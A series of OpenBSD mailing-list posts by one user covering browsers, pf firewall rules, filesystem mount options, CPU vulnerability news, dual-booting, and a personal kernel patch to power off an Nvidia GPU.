Re: chromium and firefox - myths and facts?
Maybe this time mail will be encoded properly. >Chrome and Safari both derive from Apple WebKit which itself is a fork >of the KHTML rendering engine developed by the KDE project, and has >*always* been, LGPL licensed code since its first release in 1998. >Yet today, Firefox is held up as the open-source darling and >Chrome/Safari is seen as the proprietary devil. >Go figure. :-) But still Chrome has a purpose to push away people from desktop programs to WebApps, because of all the advertisement, marketing and tracking possibilities WebApps give to the companies, especially Google. WebApps also means data is not stored locally, but remotely. Not to mention Chrome sends your history to Google servers when you log in into Google Account(Gmail, Youtube). I know some people can write open-source WebApps and host them on their private servers or at least paid VPSes, but how many? Not to mention these WebApps will probably not cover every use-case and they are going to use some company WebApp anyway.
Re: chromium and firefox - myths and facts?
Chrome and Safari both derive from Apple WebKit which itself is a forkof the KHTML rendering engine developed by the KDE project, and has*always* been, LGPL licensed code since its first release in 1998.Yet today, Firefox is held up as the open-source darling andChrome/Safari is seen as the proprietary devil. Go figure. :-)But still Chrome has a purpose to push away people from desktop programs to WebApps, because of all the advertisement, marketing and tracking possibilities WebApps give to the companies, especially Google. WebApps also meansdata is not stored locally, but remotely.Not to mention Chrome sends your history to Googleservers when you log in into Google Account(Gmail, Youtube).I know some people can write open-source WebAppsand host them on their private servers or at leastpaid VPSes, but how many?
Re: Can SSH report successful connections to pf?
>At the end of a "pass" rule in pf.conf, the author adds: > > max‐src‐conn 3, max‐src‐conn‐rate 2/5, overload flush global > >which means: > > "any source can only have a total of three connections, > and they may not create them at a rate faster than two > every five minutes. If they do, they will be added to the > abusers table and every packet/session will be globally > dropped." > >I locked myself out of many boxes thanks to that. As Peter pointed out it is best to set timeout/expiry date for IPs in blocklist. One can also create whitelist for you own IPs. Personally I had checked IP my ISP gave me, then checked by online services what AS number and CIDR this IP is contained in. Then added to whitelist table. It creates some hole in firewall, but proactive firewall based on blocklists in itself isn't strong protection. It is mostly useful for performance reasons.
Re: For a FFS on an SSD, which of "-o" nil, "sync" &/ "softdep" is more data-safe and fast?
> Hi! > > If I understand mount(8) (http://man.openbsd.org/mount) right, FFS > mounts have a metadata I/O mode and a data I/O mode. By default, > metadata is accessed synchronously and data is accessed > asynchronously. > > "-o sync" will force both to synchronous mode, and "-o softdep" would > change the metadata I/O mode to the alternative softdep access mode. No. softdep and async are different concepts. Default: metadata, data accordingly: sync, async not that there is async - not softdep You can do the oposite by options: nosync, noasync It would mean asynchronous mode for metadata and synchronous for data - which is stupid (slow and dangerous), so don't. I think default are quite good for SSD. Maybe add noatime for some partitions.
Re: Kernel memory leaking on Intel CPUs?
Intel provided stable microcode for Skylake mitigating Spectre variant 2. Current status https://newsroom.intel.com/wp-content/uploads/sites/11/2018/02/microcode-update-guidance.pdf When it comes to Meltdown: Does OpenBSD is going to release patches for 6.2? I don't see anything related to Meltdown in errata, but maybe it is too early. I understand other OSes received disclosed information about bug a few months earlier.
Re: Kernel memory leaking on Intel CPUs?
There are some claims about Raspberry Pi: Here you go: We do not believe any generation of Raspberry Pi hardware is susceptible to either the Spectre or Meltdown vulnerabilities. https://twitter.com/EbenUpton/status/948999181309530116 Why Raspberry Pi isn’t vulnerable to Spectre or Meltdown https://www.raspberrypi.org/blog/why-raspberry-pi-isnt-vulnerable-to-spectre-or-meltdown/
Re: Kernel memory leaking on Intel CPUs?
Intel is probably waiting for Microsoft, Red Hat, Apple and major cloud companies to update OSes until release of Intel Security Advisory. I am also curious does OpenBSD also maps kernel to userspace memory of processes? Could pledge protect against some scenarios exploiting these kinds of bugs?
JRE, Java and JavaFX
Hello, I would like to know whether is possible to execute GUI app based on JavaFX using OpenBSD's package for JRE. I had tried to compile and run but Maven says it can't find JavaFX classes. I also tried to compile on Windows and then copy target directory to OpenBSD, but again I see something similar: /usr/local/jre-1.8.0/bin/java -cp target/app-0.1-SNAPSHOT.jar com.company.app.Main Exception in thread "main" java.lang.NoClassDefFoundError: javafx/application/Application at java.lang.ClassLoader.defineClass1(Native Method) at java.lang.ClassLoader.defineClass(ClassLoader.java:763) at java.security.SecureClassLoader.defineClass(SecureClassLoader.java:142) at java.net.URLClassLoader.defineClass(URLClassLoader.java:467) at java.net.URLClassLoader.access$100(URLClassLoader.java:73) at java.net.URLClassLoader$1.run(URLClassLoader.java:368) at java.net.URLClassLoader$1.run(URLClassLoader.java:362) at java.security.AccessController.doPrivileged(Native Method) at java.net.URLClassLoader.findClass(URLClassLoader.java:361) at java.lang.ClassLoader.loadClass(ClassLoader.java:424) at sun.misc.Launcher$AppClassLoader.loadClass(Launcher.java:335) at java.lang.ClassLoader.loadClass(ClassLoader.java:357) at com.company1.app.Main.main(Main.java:7) Caused by: java.lang.ClassNotFoundException: javafx.application.Application at java.net.URLClassLoader.findClass(URLClassLoader.java:381) at java.lang.ClassLoader.loadClass(ClassLoader.java:424) at sun.misc.Launcher$AppClassLoader.loadClass(Launcher.java:335) at java.lang.ClassLoader.loadClass(ClassLoader.java:357) ... 13 more Have a nice day.
Re: For the super paranoid
News from Reddit: "AMD Listened to us, and added a PSP disable option in their new AGESA version!" Not my picture (Credit to u/repo_code), but https://drive.google.com/file/d/1b4p3d-gtHbFvkUbHYC8HSIviL-1ssC7V/view My Gigabyte AB350 Gaming 3 also has a bios based on the new agesa version, through it doesn't have the PBS options by default, so I enabled them, flashed the new bios, and indeed the setting was there! >In order for me to trust AMD's implementation, they first need to can >that ridiculous Platform "Security" Processor. It is as useless and >dangerous as Intel Management Engine, running unknown code. > >A more plausible attack would be an application using malloc() for a >large segment of memory, and transmitting the "uninitialised" content, >which could contain private keys, sensitive documents, etc. from >applications that either don't zero the memory after finishing, or >programs which have crashed and the memory is now freely available >to other processes. > >It would be nice in those cases to have different >keys for different pages, so that when a process is terminated, the >kernel can (instruct the CPU to) overwrite the key with a new random >number. > >On Sat, 11 Mar 2017 20:18:37 + (UTC) >Christian Weisgerberwrote: > >> AMD thinks so. Last year they announced support for memory encryption >> in future CPUs. The top two Google hits: >> >> http://amd-dev.wpengine.netdna-cdn.com/wordpress/media/2013/12/AMD_Memory_Encryption_Whitepaper_v7-Public.pdf >> >> https://events.linuxfoundation.org/sites/events/files/slides/AMD%20x86%20Memory%20Encryption%20Technology%20LSS%20Slides.pdf >>
Re: Intel's Management Technology is indeed vulnerable
Intel's firmware bugs: Intel SA-00086 Intel ID: INTEL-SA-00086 Product family: Various Impact of vulnerability:Elevation of Privilege Severity rating:Important Original release: Nov 20, 2017 Last revised: Nov 21, 2017 https://www.us-cert.gov/ncas/current-activity/2017/11/21/Intel-Firmware-Vulnerability >From gadgets.ndtv.com: Security research firm Positive Technologies has said it will demonstrate an exploit that allows the running of arbitrary unsigned code on any PC with an Intel 6th Gen 'Skylake' Core CPU or later. The security hole exists because of Intel's Management Engine, a tiny microprocessor that exists within the platform controller, or chipset, of every PC motherboard built for Intel processors. The Intel Management Engine (IME) was introduced to allow functions such as remote booting and administration, but it also handles the initialisation of the CPU and its power management. Will Harris on twitter comments satirically: Intel advisory generator: "Multiple unspecified issues in unspecified component in unspecified platform of unspecified version allows unspecified process to access privileged content via unspecified vector."
Re: Guess what today is
Happy birthday and live long OpenBSD!
Re: About WPA2 compromised protocol
Stefan Sperling: > Also this was *NOT* a protocol bug. > arstechnica claimed such nonesense without any basis in fact and > now everybody keeps repeating it :( Actually, the researcher claimed that are in the standard itself. https://www.krackattacks.com/ The weaknesses are in the Wi-Fi standard itself, and not in individual products or implementations. Therefore, any correct implementation of WPA2 is likely affected. Some paragraphs remarks about OpenBSD in a direct way. Paper Although this paper is made public now, it was already submitted for review on 19 May 2017. After this, only minor changes were made. As a result, the findings in the paper are already several months old. In the meantime, we have found easier techniques to carry out our key reinstallation attack against the 4-way handshake. With our novel attack technique, it is now trivial to exploit implementations that only accept encrypted retransmissions of message 3 of the 4-way handshake. In particular this means that attacking macOS and OpenBSD is significantly easier than discussed in the paper. Some attacks in paper seem hard We have follow-up work making our attacks (against for example macOS and OpenBSD) significantly more general and easier to execute. So although we agree that some of the attack scenarios in the paper are rather impractical, do not let this fool you into believing key reinstallation attacks cannot be abused in practice. How did you discover these vulnerabilities? When working on the final (i.e. camera-ready) version of another paper, I was double-checking some claims we made regarding OpenBSD's implementation of the 4-way handshake. In a sense I was slacking off, because I was supposed to be just finishing the paper, instead of staring at code. But there I was, inspecting some code I already read a hundred times, to avoid having to work on the next paragraph. It was at that time that a particular call to ic_set_key caught my attention. This function is called when processing message 3 of the 4-way handshake, and it installs the pairwise key to the driver. While staring at that line of code I thought “Ha. I wonder what happens if that function is called twice”. At the time I (correctly) guessed that calling it twice might reset the nonces associated to the key. And since message 3 can be retransmitted by the Access Point, in practice it might indeed be called twice. “Better make a note of that. Other vendors might also call such a function twice. But let's first finish this paper...”. A few weeks later, after finishing the paper and completing some other work, I investigated this new idea in more detail. And the rest is history.
softraid i/o error 5 @ CRYPTO block
Hello During recent update from older -current amd64 to newest -current amd64 kernel printed softraid/CRYPTO error. This error message was printed after re-linking of kernel which failed. What does this mean? Small part of dmesg: sd1 at scsibus1 targ 1 lun 0:SCSI2 0/direct fixed sd1: 71682MB, 512 bytes/sector, 146805279 sectors root on rd0a swap on rd0b dump on rd0b softraid0: sd1: i/o error 5 @ CRYPTO block 27426768 syncing disks... OpenBSD 6.2-current (GENERIC.MP) #149: Sat Oct 14 14:21:11 MDT 2017 dera...@amd64.openbsd.org:/usr/src/sys/arch/amd64/compile/GENERIC.MP *** full dmesg: https://paste.opensuse.org/ebf3782c OpenBSD 6.2-current (RAMDISK_CD) #147: Sat Oct 14 14:25:36 MDT 2017 dera...@amd64.openbsd.org:/usr/src/sys/arch/amd64/compile/RAMDISK_CD real mem = 632704 (6018MB) avail mem = 6116085760 (5832MB) mainbus0 at root bios0 at mainbus0: SMBIOS rev. 2.7 @ 0xe6df0 (39 entries) bios0: vendor Acer version "V2.21" date 12/16/2013 bios0: Acer Aspire E1-531G acpi0 at bios0: rev 2 acpi0: tables DSDT FACP UEFI ASF! HPET APIC MCFG SSDT BOOT ASPT DBGP FPDT SSDT SSDT SSDT acpimadt0 at acpi0 addr 0xfee0: PC-AT compat cpu0 at mainbus0: apid 0 (boot processor) cpu0: Intel(R) Pentium(R) CPU B960 @ 2.20GHz, 2195.37 MHz cpu0: FPU,VME,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV,PAT,PSE36,CFLUSH,DS,ACPI,MMX,FXSR,SSE,SSE2,SS,HTT,TM,PBE,SSE3,PCLMUL,DTES64,MWAIT,DS-CPL,EST,TM2,SSSE3,CX16,xTPR,PDCM,PCID,SSE4.1,SSE4.2,x2APIC,POPCNT,DEADLINE,XSAVE,NXE,RDTSCP,LONG,LAHF,PERF,ITSC,SENSOR,ARAT cpu0: 256KB 64b/line 8-way L2 cache cpu0: apic clock running at 99MHz cpu0: mwait min=64, max=64, C-substates=0.2.1.1.2, IBE cpu at mainbus0: not configured ioapic0 at mainbus0: apid 0 pa 0xfec0, version 20, 24 pins acpiprt0 at acpi0: bus 0 (PCI0) acpiprt1 at acpi0: bus -1 (P0P1) acpiprt2 at acpi0: bus 2 (RP01) acpiprt3 at acpi0: bus 3 (RP02) acpiprt4 at acpi0: bus -1 (RP03) acpiprt5 at acpi0: bus -1 (RP04) acpiprt6 at acpi0: bus -1 (RP05) acpiprt7 at acpi0: bus -1 (RP06) acpiprt8 at acpi0: bus -1 (RP07) acpiprt9 at acpi0: bus -1 (RP08) acpiprt10 at acpi0: bus 1 (PEG0) acpiprt11 at acpi0: bus -1 (PEG1) acpiprt12 at acpi0: bus -1 (PEG2) acpiprt13 at acpi0: bus -1 (PEG3) acpiec0 at acpi0 acpicpu at acpi0 not configured "10250759" at acpi0 not configured "ETD0500" at acpi0 not configured "INT3F0D" at acpi0 not configured "PNP0C0A" at acpi0 not configured "ACPI0003" at acpi0 not configured "PNP0C0C" at acpi0 not configured "PNP0C0D" at acpi0 not configured "PNP0C0E" at acpi0 not configured "PNP0C14" at acpi0 not configured "PNP0C14" at acpi0 not configured "INT340E" at acpi0 not configured pci0 at mainbus0 bus 0 pchb0 at pci0 dev 0 function 0 "Intel Core 2G Host" rev 0x09 ppb0 at pci0 dev 1 function 0 "Intel Core 2G PCIE" rev 0x09: msi pci1 at ppb0 bus 1 1:0:0: mem address conflict 0xfff8/0x8 vendor "NVIDIA", unknown product 0x1140 (class display subclass VGA, rev 0xa1) at pci1 dev 0 function 0 not configured vga1 at pci0 dev 2 function 0 "Intel HD Graphics 2000" rev 0x09 wsdisplay1 at vga1 mux 1: console (80x25, vt100 emulation) "Intel 7 Series MEI" rev 0x04 at pci0 dev 22 function 0 not configured ehci0 at pci0 dev 26 function 0 "Intel 7 Series USB" rev 0x04: apic 0 int 16 usb0 at ehci0: USB revision 2.0 uhub0 at usb0 configuration 1 interface 0 "Intel EHCI root hub" rev 2.00/1.00 addr 1 "Intel 7 Series HD Audio" rev 0x04 at pci0 dev 27 function 0 not configured ppb1 at pci0 dev 28 function 0 "Intel 7 Series PCIE" rev 0xc4: msi pci2 at ppb1 bus 2 2:0:0: mem address conflict 0xf800/0x800 bge0 at pci2 dev 0 function 0 "Broadcom BCM57785" rev 0x10, BCM57765 B0 (0x57785100): msi, address b8:88:e3:d3:08:70 brgphy0 at bge0 phy 1: BCM57765 10/100/1000baseT PHY, rev. 4 sdhc0 at pci2 dev 0 function 1 "Broadcom SD Host Controller" rev 0x10: apic 0 int 17 sdhc0: SDHC 3.0, 200 MHz base clock sdmmc0 at sdhc0: 8-bit, sd high-speed, mmc high-speed, dma vendor "Broadcom", unknown product 0x16be (class system subclass miscellaneous, rev 0x10) at pci2 dev 0 function 2 not configured vendor "Broadcom", unknown product 0x16bf (class system subclass miscellaneous, rev 0x10) at pci2 dev 0 function 3 not configured ppb2 at pci0 dev 28 function 1 "Intel 7 Series PCIE" rev 0xc4: msi pci3 at ppb2 bus 3 iwn0 at pci3 dev 0 function 0 "Intel Centrino Advanced-N 6200" rev 0x35: msi, MIMO 2T2R, MoW, address 00:27:10:a7:bf:cc ehci1 at pci0 dev 29 function 0 "Intel 7 Series USB" rev 0x04: apic 0 int 23 usb1 at ehci1: USB revision 2.0 uhub1 at usb1 configuration 1 interface 0 "Intel EHCI root hub" rev 2.00/1.00 addr 1 "Intel HM77 LPC" rev 0x04 at pci0 dev 31 function 0 not configured ahci0 at pci0 dev 31 function 2 "Intel 7 Series AHCI" rev 0x04: msi, AHCI 1.3 ahci0: port 0: 3.0Gb/s ahci0: port 2: 1.5Gb/s scsibus0 at ahci0: 32 targets sd0 at scsibus0 targ 0 lun 0: SCSI3 0/direct fixed naa.5000c5005c9384dd sd0: 476940MB, 512 bytes/sector, 976773168 sectors cd0 at
Re: Flaw resides in BTB helps bypass ASLR
> if you read the paper, you will notice that they only tested on Ubuntu and > OSX, > neither of which actually ship with ASLR enabled by default if I remember > correctly. https://wiki.ubuntu.com/Security/Features
Re: VMM test
>> Hi Everybody, >> >> I would like to give a try to vmm. If I do so, which os can I expect >> to make it work? openbsd ok I guess. Linux? Windows? >OpenBSD only, as of now. Does it support both i386 and amd64 OpenBSDs guests?
Re: Unexpected behavior in su/doas
> > This is just one mechanism on tty, there are others. On other > > descriptors there are other abilities. > > > > Would you mind explaining this a little bit. I don't really mean the > sudo/doas part. > > How to do operations without retaining access to a tty? > > What other descriptors? Example: If you have file descriptor to directory outside chroot and you are root user you can escape chroot. https://filippo.io/escaping-a-chroot-jail-slash-1/
Re: 6.0-stable panic
dhill () mindcry ! org also posted message to bugs mailing list probably about this issue. Title/subject: KASSERT((sk->inp == NULL) || (sk->inp->inp_pf_sk == NULL)); http://marc.info/?l=openbsd-bugs=147472138723508=2 I also can confirm that relayd is triggering this kernel panic on my system by exit syscall. I have posted relayd.conf in mentioned thread. Maybe you could post too, so we could check similarities.
Re: Dual booting - can't boot OpenBSD from Windows 10 bootloader
>Thank you all for your asnwers. I cannot use grub or lilo as some of >you pointed out beaceuse grub is i386 only and lilo isn't even in >ports, and I don't have linux installed. Neither do I, but I have Grub2 (from Debian amd64) and OpenBSD amd64 ;) You don't need to install any Gnu/Linux system to have bootloader from Gnu/Linux. You just need to prepare pendrive to boot liveCD *once* and install lilo or Grub2 bootloader, but not need to install the whole system. I must admit that I have additional 50MB partition with ext2 filesystem for bootloader.
Dual booting - can't boot OpenBSD from Windows 10 bootloader
I have installed OpenBSD before it had UEFI support, so I installed in Legacy Boot mode (I have UEFI capable laptop). I personally use Grub2 installed via debian live amd64 standard image. I don't have Gnu/Linux installed. I only have bootloader from Debian. I have Windows 8.1 and OpenBSD amd64. # cat /mnt/ext2/grub/grub.cfg \ > | grep -v -e ^# -e ^[:space:]*$ GRUB_DEFAULT=0 GRUB_TIMEOUT=5 GRUB_DISTRIBUTOR=`lsb_release -i -s 2> /dev/null || echo Debian` GRUB_CMDLINE_LINUX_DEFAULT="quiet" GRUB_CMDLINE_LINUX="" menuentry "Windows" --class os { set root=(hd0,2) chainloader (hd0,msdos2)+1 } menuentry "OpenBSD" { set root=(hd0,4) chainloader +1 } Grub2 is faster than Windows bootloader.
Re: graphics acceleration, DRI2, DRM problem
I think that actual, real job is done by: aml_evalname(sc, node, "_OFF", 0, NULL, ) or aml_evalinteger(sc, node, "_OFF", 0, NULL, ) inside acpi.c file. The only good thing about this patch is that it works for me.
Re: graphics acceleration, DRI2, DRM problem
> > +filedev/pci/nvdsbl.c > > can you include this file? and any new .h files as well? I think that this was just for registering a dummy driver for that Nvidia device. It does nothing useful itself. # cat /usr/src/sys/dev/pci/nvdsbl.c /* $OpenBSD: nvdsbl.c,v 0.1 2015/07/28 12:00:01 somebody Exp $ */ /* * Driver changes power state / disables Nvidia GPU */ #include #include #include #include #include #include struct nvdsbl_softc { struct device dev; struct pci_attach_args nvdsbl_pa; }; int nvdsbl_probe(struct device *, void *, void *); void nvdsbl_attach(struct device *, struct device *, void *); struct cfattach nvdsbl_ca = { sizeof(struct nvdsbl_softc), nvdsbl_probe, nvdsbl_attach, NULL, NULL }; struct cfdriver nvdsbl_cd = { NULL, "nvdsbl", DV_DULL }; static const struct pci_matchid nvdsbl_devices[] = { { 0x10de, 0x1140 } }; int nvdsbl_probe(struct device *parent, void *match, void *aux) { pci_matchbyid((struct pci_attach_args *)aux,nvdsbl_devices,nitems(nvdsbl_devices)); } void nvdsbl_attach(struct device *parent, struct device *self, void *aux) { printf("inside pci nvdsbl attach\n"); }
Re: graphics acceleration, DRI2, DRM problem
This is totally fucked up code, but if you like hazard... I mean that I really just called some random ACPI (aml) methods not knowing what they should do. Additionally this code is for my laptop. I have GEFORCE 620M GPU, so I added this to pcidevs. Another thing is that patched code recognizes my GPU device through ACPI name "\\_SB_.PCI0.PEG0.PEGP". I have discovered name when I was using Linux kernel's module called acpi_call. Other laptops may have differently named GPUs. You use this at your own risk and you must *not* report bugs to Project when using patched kernel. File: GENERIC Status: Locally Modified Working revision:1.427 Repository revision: 1.427 /cvs/src/sys/arch/amd64/conf/GENERIC,v Commit Identifier: xNzAQvg5oqM2b0pn File: acpi.cStatus: Locally Modified Working revision:1.313 Repository revision: 1.313 /cvs/src/sys/dev/acpi/acpi.c,v Commit Identifier: h0GHFDGWnEdswfbK File: dsdt.cStatus: Locally Modified Working revision:1.223 Repository revision: 1.223 /cvs/src/sys/dev/acpi/dsdt.c,v Commit Identifier: SBTJg3diM8lXHXRE File: files.pci Status: Locally Modified Working revision:1.324 Repository revision: 1.324 /cvs/src/sys/dev/pci/files.pci,v Commit Identifier: aeD3LK9Qomrjecge File: pcidevs Status: Locally Modified Working revision:1.1802 Repository revision: 1.1802 /cvs/src/sys/dev/pci/pcidevs,v Commit Identifier: ZupaPoe9OBu6iKll File: pcidevs.h Status: Locally Modified Working revision:1.1796 Repository revision: 1.1796 /cvs/src/sys/dev/pci/pcidevs.h,v Commit Identifier: Z3aUcOQiFLoINK6d File: pcidevs_data.hStatus: Locally Modified Working revision:1.1791 Repository revision: 1.1791 /cvs/src/sys/dev/pci/pcidevs_data.h,v Commit Identifier: Z3aUcOQiFLoINK6d Index: sys/arch/amd64/conf/GENERIC === RCS file: /cvs/src/sys/arch/amd64/conf/GENERIC,v retrieving revision 1.427 diff -u -p -r1.427 GENERIC --- sys/arch/amd64/conf/GENERIC 3 Aug 2016 17:23:38 - 1.427 +++ sys/arch/amd64/conf/GENERIC 19 Aug 2016 21:31:07 - @@ -11,7 +11,7 @@ machineamd64 include"../../../conf/GENERIC" -maxusers 80 # estimated number of users +maxusers 100 # estimated number of users option USER_PCICONF# user-space PCI configuration @@ -22,10 +22,14 @@ option MTRR# CPU memory range attribu #optionKGDB# Remote debugger support; exclusive of DDB #option"KGDB_DEVNAME=\"com\"",KGDBADDR=0x2f8,KGDBRATE=9600 -option NTFS# NTFS support +#optionNTFS# NTFS support option HIBERNATE # Hibernate support + +option HZ=300 + config bsd swap generic +#optionDEBUG mainbus0 at root @@ -399,6 +403,7 @@ adw*at pci? # AdvanSys ULTRA WIDE SC pcscp* at pci? # AMD 53c974 PCscsi-PCI SCSI #trm* at pci? # Tekram DC-3x5U SCSI Controllers vmwpvs*at pci? # VMware ParaVirtual SCSI +nvdsbl* at pci? # Nvidia PCI Driver for disabling nvme* at pci? # NVMe controllers scsibus* at scsi? Index: sys/dev/acpi/acpi.c === RCS file: /cvs/src/sys/dev/acpi/acpi.c,v retrieving revision 1.313 diff -u -p -r1.313 acpi.c --- sys/dev/acpi/acpi.c 28 Jul 2016 21:57:56 - 1.313 +++ sys/dev/acpi/acpi.c 19 Aug 2016 21:31:44 - @@ -562,11 +562,11 @@ acpi_getpci(struct aml_node *node, void { const char *pcihid[] = { ACPI_DEV_PCIB, ACPI_DEV_PCIEB, "HWP0002", 0 }; struct acpi_pci *pci, *ppci; - struct aml_value res; + struct aml_value res,res2; struct acpi_softc *sc = arg; pci_chipset_tag_t pc = NULL; pcitag_t tag; - uint64_t val; + uint64_t val,val2; uint32_t reg; if (!node->value || node->value->type != AML_OBJTYPE_DEVICE) @@ -620,6 +620,35 @@ acpi_getpci(struct aml_node *node, void pci->bus, pci->dev, pci->fun, aml_nodename(node)); + + bool czyNvidiaGPU = false; +if (!(strcmp("\\_SB_.PCI0.PEG0.PEGP",aml_nodename(node +czyNvidiaGPU = true; + +if (czyNvidiaGPU) { +printf("bedzie evalname na GPU\n"); +bool czyPoprawnieName = false; +if(aml_evalname(sc, node, "_OFF", 0, NULL, )){ +printf("evalname na GPU true\n"); +czyPoprawnieName = true; +aml_freevalue(); +} else { +
Re: graphics acceleration, DRI2, DRM problem
I have trimmed lspci output, but actually it was important. I have not only Intel GPU but also Nvidia GPU. A year ago I have written ugly hack to disable Nvidia GPU year ago for power saving. I am sure that is too ugly to commit to repository and I am not programming professional so I need a lot of time to write even ugly and tiny patch. Actually DRI2 works if I recompile the kernel with my patch. Following is printed by mpv with working graphics acceleration: $ EGL_LOG_LEVEL=debug LIBGL_DEBUG=verbose MESA_DEBUG=1 mpv movie.avi Playing: movie.avi (+) Video --vid=1 (mpeg4) (+) Audio --aid=1 (ac3) (+) Subs --sid=1 'movie.srt' (subrip) (external) libGL: OpenDriver: trying /usr/X11R6/lib/modules/dri/i965_dri.so libGL: Using DRI2 for screen 0 libEGL debug: Native platform type: x11 (autodetected) libEGL debug: added egl_dri2 to module array libEGL debug: DRI2: dlopen(/usr/X11R6/lib/modules/dri/i965_dri.so) libEGL debug: found extension `DRI_Core' libEGL info: found extension DRI_Core version 1 libEGL debug: found extension `DRI_IMAGE_DRIVER' libEGL debug: found extension `DRI_DRI2' libEGL info: found extension DRI_DRI2 version 4 libEGL debug: found extension `DRI_DriverVtable' libEGL debug: found extension `DRI_ConfigOptions' libEGL debug: found extension `DRI_TexBuffer' libEGL info: found extension DRI_TexBuffer version 3 libEGL debug: found extension `DRI2_Fence' libEGL debug: found extension `DRI2_Flush' libEGL info: found extension DRI2_Flush version 4 libEGL debug: found extension `DRI_IMAGE' libEGL info: found extension DRI_IMAGE version 11 libEGL debug: found extension `DRI_RENDERER_QUERY' libEGL debug: found extension `DRI_CONFIG_QUERY' libEGL debug: found extension `DRI_Robustness' libEGL info: Using DRI2 libEGL debug: the best driver is DRI2 [ffmpeg/audio] ac3: Channel layout '5.1(side)' with 6 channels does not match specified number of channels 2: ignoring specified channel layout AO: [sdl] 48000Hz stereo 2ch s32 VO: [opengl] 720x304 yuv420p AV: 00:29:00 / 02:14:49 (21%) A-V: 0.000 Cache: 0s+1MB [ffmpeg/audio] ac3: frame sync error Error decoding audio. AV: 00:41:39 / 02:14:49 (30%) A-V: 0.000 Cache: 0s+8MB [ffmpeg/audio] ac3: frame sync error Error decoding audio. AV: 00:41:42 / 02:14:49 (30%) A-V: 0.000 Cache: 9s+8MB Exiting... (Quit) pthread_mutex_destroy on mutex with waiters! libEGL debug: Display 0x1728778c8800 is destroyed with resources
graphics acceleration, DRI2, DRM problem
Hello I have: $ sysctl kern.version kern.version=OpenBSD 6.0-current (GENERIC.MP) #2353: Sat Aug 13 11:34:33 MDT 2016 dera...@amd64.openbsd.org:/usr/src/sys/arch/amd64/compile/GENERIC.MP # sysctl hw.model hw.model=Intel(R) Pentium(R) CPU B960 @ 2.20GHz # lspci -nn | grep VGA 00:02.0 VGA compatible controller [0300]: Intel Corporation 2nd Generation Core Processor Family Integrated Graphics Controller [8086:0106] (rev 09) It is Sandy Bridge CPU and GPU: HD 2000. I used to watch movies on OpenBSD but now (since a few days and upgrades) I have problems with performance of multimedia/mpv. I suspect software problem with DRI2. Infos about Audio/Video desynchronisation were present always, but they don't disturbed, prevented from watching movies. libEGL warning: DRI2: failed to authenticate did it in past, so I needed to upgrade packages and base to solve problem in past. Now it unfortunately didn't helped. I chown-ed drm files: # chown open /dev/drm[0-3] # But it didn't helped. Part of Xorg.0.log: [ 3005.601] (II) intel(0): SNA initialized with Sandybridge (gen6, gt1) backend [ 3005.601] (==) intel(0): Backing store enabled [ 3005.601] (==) intel(0): Silken mouse disabled [ 3005.601] (II) intel(0): HW Cursor enabled [ 3005.601] (II) intel(0): RandR 1.2 enabled, ignore the following RandR disabled message. [ 3005.601] (==) intel(0): DPMS enabled [ 3005.602] (WW) intel(0): [DRI2] Direct rendering is not supported when VGA arb is necessary for the device [ 3005.602] (II) intel(0): hardware support for Present enabled [ 3005.602] (--) RandR disabled [ 3005.602] (II) Found 2 VGA devices: arbiter wrapping enabled [ 3005.620] (II) AIGLX: Screen 0 is not DRI2 capable [ 3005.620] (EE) AIGLX: reverting to software rendering [ 3005.631] (II) AIGLX: enabled GLX_MESA_copy_sub_buffer [ 3005.632] (II) AIGLX: Loaded and initialized swrast [ 3005.632] (II) GLX: Initialized DRISWRAST GL provider for screen 0 What mpv is printing: $ EGL_LOG_LEVEL=debug LIBGL_DEBUG=verbose MESA_DEBUG=1 mpv movie.avi Playing: movie.avi (+) Video --vid=1 (mpeg4) (+) Audio --aid=1 (ac3) (+) Subs --sid=1 'movie.srt' (subrip) (external) libGL: screen 0 does not appear to be DRI2 capable libGL: OpenDriver: trying /usr/X11R6/lib/modules/dri/swrast_dri.so libEGL debug: Native platform type: x11 (autodetected) libEGL debug: added egl_dri2 to module array libEGL warning: DRI2: failed to authenticate libEGL debug: DRI2: dlopen(/usr/X11R6/lib/modules/dri/swrast_dri.so) libEGL debug: found extension `DRI_Core' libEGL info: found extension DRI_Core version 1 libEGL debug: found extension `DRI_SWRast' libEGL info: found extension DRI_SWRast version 4 libEGL debug: found extension `DRI_CopySubBuffer' libEGL debug: found extension `DRI_ConfigOptions' libEGL debug: found extension `DRI_TexBuffer' libEGL info: found extension DRI_TexBuffer version 2 libEGL debug: found extension `DRI_RENDERER_QUERY' libEGL debug: found extension `DRI_CONFIG_QUERY' libEGL debug: the best driver is DRI2 [ffmpeg/audio] ac3: Channel layout '5.1(side)' with 6 channels does not match specified number of channels 2: ignoring specified channel layout AO: [sdl] 48000Hz stereo 2ch s32 VO: [opengl] 720x304 yuv420p AV: 00:00:00 / 02:14:49 (0%) A-V: 0.211 Cache: 9s+16MB Audio/Video desynchronisation detected! Possible reasons include too slow hardware, temporary CPU spikes, broken drivers, and broken files. Audio position will not match to the video (see A-V status field). AV: 00:00:08 / 02:14:49 (0%) A-V: 0.000 Dropped: 176 Cache: 9s+16MB Exiting... (Quit) pthread_mutex_destroy on mutex with waiters! libEGL debug: Display 0x34f55a7000 is destroyed with resources $ $ cat /var/log/Xorg.0.log [ 3005.453] (--) checkDevMem: using aperture driver /dev/xf86 [ 3005.465] (--) Using wscons driver on /dev/ttyC4 [ 3005.484] X.Org X Server 1.18.4 Release Date: 2016-07-19 [ 3005.484] X Protocol Version 11, Revision 0 [ 3005.484] Build Operating System: OpenBSD 6.0 amd64 [ 3005.484] Current Operating System: OpenBSD r2d2 6.0 GENERIC.MP#2353 amd64 [ 3005.485] Build Date: 13 August 2016 11:57:16AM [ 3005.485] [ 3005.485] Current version of pixman: 0.32.8 [ 3005.485]Before reporting problems, check http://wiki.x.org to make sure that you have the latest version. [ 3005.485] Markers: (--) probed, (**) from config file, (==) default setting, (++) from command line, (!!) notice, (II) informational, (WW) warning, (EE) error, (NI) not implemented, (??) unknown. [ 3005.485] (==) Log file: "/var/log/Xorg.0.log", Time: Sun Aug 14 12:12:48 2016 [ 3005.485] (==) Using config directory: "/etc/X11/xorg.conf.d" [ 3005.486] (==) Using system config directory "/usr/X11R6/share/X11/xorg.conf.d" [ 3005.486] (==) No Layout section. Using the first Screen section. [ 3005.486] (==) No screen section available. Using defaults. [ 3005.486] (**) |-->Screen "Default Screen Section" (0) [ 3005.486] (**) | |-->Monitor "" [ 3005.486] (==) No
Re: /usr/ and wxallowed
